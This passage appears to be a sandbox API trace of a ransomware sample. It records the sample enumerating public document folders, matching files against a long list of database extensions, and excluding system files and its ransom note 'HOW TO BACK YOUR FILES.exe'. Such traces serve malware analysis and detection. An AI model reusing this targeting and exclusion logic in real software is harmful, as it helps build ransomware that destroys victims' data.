lpString2="mdb") returned -1 [0040.200] lstrlenW (lpString="sql") returned 3 [0040.200] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0040.200] lstrlenW (lpString="sqlite") returned 6 [0040.200] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0040.200] lstrlenW (lpString="sqlite3") returned 7 [0040.200] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0040.200] lstrlenW (lpString="sqlitedb") returned 8 [0040.201] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0040.201] lstrlenW (lpString="xml") returned 3 [0040.201] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0040.201] lstrlenW (lpString="$er") returned 3 [0040.201] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0040.201] lstrlenW (lpString="4dd") returned 3 [0040.201] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0040.201] lstrlenW (lpString="4dl") returned 3 [0040.201] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0040.201] lstrlenW (lpString="^^^") returned 3 [0040.201] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0040.201] lstrlenW (lpString="abs") returned 3 [0040.201] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0040.201] lstrlenW (lpString="abx") returned 3 [0040.201] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0040.201] lstrlenW (lpString="accdb") returned 5 [0040.201] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0040.201] lstrlenW (lpString="accdc") returned 5 [0040.201] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0040.201] lstrlenW (lpString="accde") returned 5 [0040.201] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0040.201] lstrlenW (lpString="accdr") returned 5 [0040.201] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0040.201] lstrlenW (lpString="accdt") returned 5 [0040.201] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0040.201] lstrlenW (lpString="accdw") returned 5 [0040.201] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0040.201] lstrlenW (lpString="accft") returned 5 [0040.201] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0040.201] lstrlenW (lpString="adb") returned 3 [0040.201] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.201] lstrlenW (lpString="adb") returned 3 [0040.201] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.201] lstrlenW (lpString="ade") returned 3 [0040.201] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0040.201] lstrlenW (lpString="adf") returned 3 [0040.202] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0040.202] lstrlenW (lpString="adn") returned 3 [0040.202] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0040.202] lstrlenW (lpString="adp") returned 3 [0040.202] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0040.202] lstrlenW (lpString="alf") returned 3 [0040.202] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0040.202] lstrlenW (lpString="ask") returned 3 [0040.202] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0040.202] lstrlenW (lpString="btr") returned 3 [0040.202] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0040.202] lstrlenW (lpString="cat") returned 3 [0040.202] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0040.202] lstrlenW (lpString="cdb") returned 3 [0040.202] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0040.202] lstrlenW (lpString="ckp") returned 3 [0040.202] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0040.202] lstrlenW (lpString="cma") returned 3 [0040.202] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0040.202] lstrlenW (lpString="cpd") returned 3 [0040.202] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0040.202] lstrlenW (lpString="dacpac") returned 6 [0040.202] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0040.202] lstrlenW (lpString="dad") returned 3 [0040.202] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0040.202] lstrlenW (lpString="dadiagrams") returned 10 [0040.202] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0040.202] lstrlenW (lpString="daschema") returned 8 [0040.202] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0040.202] lstrlenW (lpString="db-journal") returned 10 [0040.202] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0040.202] lstrlenW (lpString="db-shm") returned 6 [0040.202] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0040.202] lstrlenW (lpString="db-wal") returned 6 [0040.202] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0040.202] lstrlenW (lpString="dbc") returned 3 [0040.203] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0040.203] lstrlenW (lpString="dbs") returned 3 [0040.203] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0040.203] lstrlenW (lpString="dbt") returned 3 [0040.203] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0040.203] lstrlenW (lpString="dbv") returned 3 [0040.203] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0040.203] lstrlenW (lpString="dbx") returned 3 [0040.203] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0040.203] lstrlenW (lpString="dcb") returned 3 [0040.203] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0040.203] lstrlenW (lpString="dct") returned 3 [0040.203] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0040.203] lstrlenW (lpString="dcx") returned 3 [0040.203] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0040.203] lstrlenW (lpString="ddl") returned 3 [0040.203] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0040.203] lstrlenW (lpString="dlis") returned 4 [0040.203] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0040.203] lstrlenW (lpString="dp1") returned 3 [0040.203] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0040.203] lstrlenW (lpString="dqy") returned 3 [0040.203] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0040.203] lstrlenW (lpString="dsk") returned 3 [0040.203] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0040.203] lstrlenW (lpString="dsn") returned 3 [0040.203] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0040.203] lstrlenW (lpString="dtsx") returned 4 [0040.203] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0040.203] lstrlenW (lpString="dxl") returned 3 [0040.203] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0040.203] lstrlenW (lpString="eco") returned 3 [0040.203] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0040.203] lstrlenW (lpString="ecx") returned 3 [0040.203] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0040.203] lstrlenW (lpString="edb") returned 3 [0040.204] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0040.204] lstrlenW (lpString="epim") returned 4 [0040.204] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0040.204] lstrlenW (lpString="fcd") returned 3 [0040.204] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0040.204] lstrlenW (lpString="fdb") returned 3 [0040.204] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0040.204] lstrlenW (lpString="fic") returned 3 [0040.204] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0040.204] lstrlenW (lpString="flexolibrary") returned 12 [0040.204] lstrlenW (lpString="fm5") returned 3 [0040.204] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0040.204] lstrlenW (lpString="fmp") returned 3 [0040.204] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0040.204] lstrlenW (lpString="fmp12") returned 5 [0040.204] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0040.204] lstrlenW (lpString="fmpsl") returned 5 [0040.204] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0040.204] lstrlenW (lpString="fol") returned 3 [0040.204] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0040.204] lstrlenW (lpString="fp3") returned 3 [0040.204] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0040.204] lstrlenW (lpString="fp4") returned 3 [0040.204] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0040.204] lstrlenW (lpString="fp5") returned 3 [0040.204] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0040.204] lstrlenW (lpString="fp7") returned 3 [0040.204] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0040.204] lstrlenW (lpString="fpt") returned 3 [0040.204] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0040.204] lstrlenW (lpString="frm") returned 3 [0040.204] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0040.204] lstrlenW (lpString="gdb") returned 3 [0040.204] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0040.204] lstrlenW (lpString="gdb") returned 3 [0040.204] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0040.205] lstrlenW (lpString="grdb") returned 4 [0040.205] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0040.205] lstrlenW (lpString="gwi") returned 3 [0040.205] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0040.205] lstrlenW (lpString="hdb") returned 3 [0040.205] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0040.205] lstrlenW (lpString="his") returned 3 [0040.205] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0040.205] lstrlenW (lpString="ib") returned 2 [0040.205] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0040.205] lstrlenW (lpString="idb") returned 3 [0040.205] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0040.205] lstrlenW (lpString="ihx") returned 3 [0040.205] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0040.205] lstrlenW (lpString="itdb") returned 4 [0040.205] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0040.205] lstrlenW (lpString="itw") returned 3 [0040.205] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0040.205] lstrlenW (lpString="jet") returned 3 [0040.205] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0040.205] lstrlenW (lpString="jtx") returned 3 [0040.205] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0040.205] lstrlenW (lpString="kdb") returned 3 [0040.205] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0040.205] lstrlenW (lpString="kexi") returned 4 [0040.205] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0040.205] lstrlenW (lpString="kexic") returned 5 [0040.205] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0040.205] lstrlenW (lpString="kexis") returned 5 [0040.205] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0040.205] lstrlenW (lpString="lgc") returned 3 [0040.205] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0040.205] lstrlenW (lpString="lwx") returned 3 [0040.205] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0040.205] lstrlenW (lpString="maf") returned 3 [0040.205] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0040.205] lstrlenW (lpString="maq") returned 3 [0040.206] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0040.206] lstrlenW (lpString="mar") returned 3 [0040.206] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0040.206] lstrlenW (lpString="marshal") returned 7 [0040.206] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0040.206] lstrlenW (lpString="mas") returned 3 [0040.206] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0040.206] lstrlenW (lpString="mav") returned 3 [0040.206] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0040.206] lstrlenW (lpString="maw") returned 3 [0040.206] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0040.206] lstrlenW (lpString="mdbhtml") returned 7 [0040.206] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0040.206] lstrlenW (lpString="mdn") returned 3 [0040.206] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0040.206] lstrlenW (lpString="mdt") returned 3 [0040.206] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0040.206] lstrlenW (lpString="mfd") returned 3 [0040.206] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0040.206] lstrlenW (lpString="mpd") returned 3 [0040.206] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0040.206] lstrlenW (lpString="mrg") returned 3 [0040.206] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0040.206] lstrlenW (lpString="mud") returned 3 [0040.206] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0040.206] lstrlenW (lpString="mwb") returned 3 [0040.206] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0040.206] lstrlenW (lpString="myd") returned 3 [0040.206] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0040.206] lstrlenW (lpString="ndf") returned 3 [0040.206] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0040.206] lstrlenW (lpString="nnt") returned 3 [0040.206] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0040.206] lstrlenW (lpString="nrmlib") returned 6 [0040.206] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0040.207] lstrlenW (lpString="ns2") returned 3 [0040.207] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0040.207] lstrlenW (lpString="ns3") returned 3 [0040.207] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0040.207] lstrlenW (lpString="ns4") returned 3 [0040.207] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0040.207] lstrlenW (lpString="nsf") returned 3 [0040.207] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0040.207] lstrlenW (lpString="nv") returned 2 [0040.207] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0040.207] lstrlenW (lpString="nv2") returned 3 [0040.207] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0040.207] lstrlenW (lpString="nwdb") returned 4 [0040.207] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0040.207] lstrlenW (lpString="nyf") returned 3 [0040.207] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0040.207] lstrlenW (lpString="odb") returned 3 [0040.207] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0040.207] lstrlenW (lpString="odb") returned 3 [0040.207] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0040.207] lstrlenW (lpString="oqy") returned 3 [0040.207] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0040.207] lstrlenW (lpString="ora") returned 3 [0040.207] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0040.207] lstrlenW (lpString="orx") returned 3 [0040.207] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0040.207] lstrlenW (lpString="owc") returned 3 [0040.207] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0040.207] lstrlenW (lpString="p96") returned 3 [0040.207] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0040.207] lstrlenW (lpString="p97") returned 3 [0040.207] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0040.207] lstrlenW (lpString="pan") returned 3 [0040.207] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0040.207] lstrlenW (lpString="pdb") returned 3 [0040.207] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0040.208] lstrlenW (lpString="pdm") returned 3 [0040.208] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0040.208] lstrlenW (lpString="pnz") returned 3 [0040.208] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0040.208] lstrlenW (lpString="qry") returned 3 [0040.208] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0040.208] lstrlenW (lpString="qvd") returned 3 [0040.208] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0040.208] lstrlenW (lpString="rbf") returned 3 [0040.208] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0040.208] lstrlenW (lpString="rctd") returned 4 [0040.208] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0040.208] lstrlenW (lpString="rod") returned 3 [0040.208] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0040.208] lstrlenW (lpString="rodx") returned 4 [0040.208] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0040.208] lstrlenW (lpString="rpd") returned 3 [0040.208] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0040.208] lstrlenW (lpString="rsd") returned 3 [0040.208] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0040.208] lstrlenW (lpString="sas7bdat") returned 8 [0040.208] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0040.208] lstrlenW (lpString="sbf") returned 3 [0040.208] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0040.208] lstrlenW (lpString="scx") returned 3 [0040.208] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0040.208] lstrlenW (lpString="sdb") returned 3 [0040.208] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0040.208] lstrlenW (lpString="sdc") returned 3 [0040.208] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0040.208] lstrlenW (lpString="sdf") returned 3 [0040.208] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0040.208] lstrlenW (lpString="sis") returned 3 [0040.208] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0040.208] lstrlenW (lpString="spq") returned 3 [0040.208] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0040.208] lstrlenW (lpString="te") returned 2 [0040.209] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0040.209] lstrlenW (lpString="teacher") returned 7 [0040.209] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0040.209] lstrlenW (lpString="tmd") returned 3 [0040.209] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0040.209] lstrlenW (lpString="tps") returned 3 [0040.209] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0040.209] lstrlenW (lpString="trc") returned 3 [0040.209] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0040.209] lstrlenW (lpString="trc") returned 3 [0040.209] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0040.209] lstrlenW (lpString="trm") returned 3 [0040.209] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0040.209] lstrlenW (lpString="udb") returned 3 [0040.209] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0040.209] lstrlenW (lpString="udl") returned 3 [0040.209] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0040.209] lstrlenW (lpString="usr") returned 3 [0040.209] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0040.209] lstrlenW (lpString="v12") returned 3 [0040.209] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0040.209] lstrlenW (lpString="vis") returned 3 [0040.209] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0040.209] lstrlenW (lpString="vpd") returned 3 [0040.209] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0040.209] lstrlenW (lpString="vvv") returned 3 [0040.209] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0040.209] lstrlenW (lpString="wdb") returned 3 [0040.209] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0040.209] lstrlenW (lpString="wmdb") returned 4 [0040.209] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0040.209] lstrlenW (lpString="wrk") returned 3 [0040.209] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0040.209] lstrlenW (lpString="xdb") returned 3 [0040.209] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0040.209] lstrlenW (lpString="xld") returned 3 [0040.210] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0040.210] lstrlenW (lpString="xmlff") returned 5 [0040.210] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0040.210] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x498af5a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x498af5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0040.210] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0040.210] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0040.210] lstrcmpiW (lpString1="My Music", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.210] lstrcmpiW (lpString1="My Music", lpString2="aoldtz.exe") returned 1 [0040.210] lstrcmpiW (lpString1="My Music", lpString2=".") returned 1 [0040.210] lstrcmpiW (lpString1="My Music", lpString2="..") returned 1 [0040.210] lstrcmpiW (lpString1="My Music", lpString2="windows") returned -1 [0040.210] lstrcmpiW (lpString1="My Music", lpString2="bootmgr") returned 1 [0040.210] lstrcmpiW (lpString1="My Music", lpString2="temp") returned -1 [0040.210] lstrcmpiW (lpString1="My Music", lpString2="pagefile.sys") returned -1 [0040.210] lstrcmpiW (lpString1="My Music", lpString2="boot") returned 1 [0040.210] lstrcmpiW (lpString1="My Music", lpString2="ids.txt") returned 1 [0040.210] lstrcmpiW (lpString1="My Music", lpString2="ntuser.dat") returned -1 [0040.210] lstrcmpiW (lpString1="My Music", lpString2="perflogs") returned -1 [0040.210] lstrcmpiW (lpString1="My Music", lpString2="MSBuild") returned 1 [0040.210] lstrlenW (lpString="My Music") returned 8 [0040.210] lstrlenW (lpString="C:\\Users\\Public\\Documents\\desktop.ini") returned 37 [0040.210] lstrcpyW (in: lpString1=0x2e2e894, lpString2="My Music" | out: lpString1="My Music") returned="My Music" [0040.210] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7cc8 [0040.210] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x46) returned 0x2ee8d0 [0040.210] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e7cd0 | out: ListHead=0x2e77d0, ListEntry=0x2e7cd0) returned 0x2e7cb0 [0040.210] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0040.210] lstrcmpiW (lpString1="My Pictures", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.210] lstrcmpiW (lpString1="My Pictures", lpString2="aoldtz.exe") returned 1 [0040.210] lstrcmpiW (lpString1="My Pictures", lpString2=".") returned 1 [0040.210] lstrcmpiW (lpString1="My Pictures", lpString2="..") returned 1 [0040.210] lstrcmpiW (lpString1="My Pictures", lpString2="windows") returned -1 [0040.210] lstrcmpiW (lpString1="My Pictures", lpString2="bootmgr") returned 1 [0040.210] lstrcmpiW (lpString1="My Pictures", lpString2="temp") returned -1 [0040.211] lstrcmpiW (lpString1="My Pictures", lpString2="pagefile.sys") returned -1 [0040.211] lstrcmpiW (lpString1="My Pictures", lpString2="boot") returned 1 [0040.211] lstrcmpiW (lpString1="My Pictures", lpString2="ids.txt") returned 1 [0040.211] lstrcmpiW (lpString1="My Pictures", lpString2="ntuser.dat") returned -1 [0040.211] lstrcmpiW (lpString1="My Pictures", lpString2="perflogs") returned -1 [0040.211] lstrcmpiW (lpString1="My Pictures", lpString2="MSBuild") returned 1 [0040.211] lstrlenW (lpString="My Pictures") returned 11 [0040.211] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Music") returned 34 [0040.211] lstrcpyW (in: lpString1=0x2e2e894, lpString2="My Pictures" | out: lpString1="My Pictures") returned="My Pictures" [0040.211] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2240 [0040.211] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4c) returned 0x2ed7f0 [0040.211] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2248 | out: ListHead=0x2e77d0, ListEntry=0x2d2248) returned 0x2e7cd0 [0040.211] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0040.211] lstrcmpiW (lpString1="My Videos", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.211] lstrcmpiW (lpString1="My Videos", lpString2="aoldtz.exe") returned 1 [0040.211] lstrcmpiW (lpString1="My Videos", lpString2=".") returned 1 [0040.211] lstrcmpiW (lpString1="My Videos", lpString2="..") returned 1 [0040.211] lstrcmpiW (lpString1="My Videos", lpString2="windows") returned -1 [0040.211] lstrcmpiW (lpString1="My Videos", lpString2="bootmgr") returned 1 [0040.211] lstrcmpiW (lpString1="My Videos", lpString2="temp") returned -1 [0040.211] lstrcmpiW (lpString1="My Videos", lpString2="pagefile.sys") returned -1 [0040.211] lstrcmpiW (lpString1="My Videos", lpString2="boot") returned 1 [0040.211] lstrcmpiW (lpString1="My Videos", lpString2="ids.txt") returned 1 [0040.211] lstrcmpiW (lpString1="My Videos", lpString2="ntuser.dat") returned -1 [0040.211] lstrcmpiW (lpString1="My Videos", lpString2="perflogs") returned -1 [0040.211] lstrcmpiW (lpString1="My Videos", lpString2="MSBuild") returned 1 [0040.211] lstrlenW (lpString="My Videos") returned 9 [0040.211] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures") returned 37 [0040.211] lstrcpyW (in: lpString1=0x2e2e894, lpString2="My Videos" | out: lpString1="My Videos") returned="My Videos" [0040.211] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2260 [0040.211] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x48) returned 0x2ee920 [0040.211] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2268 | out: ListHead=0x2e77d0, ListEntry=0x2d2268) returned 0x2d2248 [0040.211] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0040.211] FindClose (in: hFindFile=0x2ccfa8 | out: hFindFile=0x2ccfa8) returned 1 [0040.212] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2268 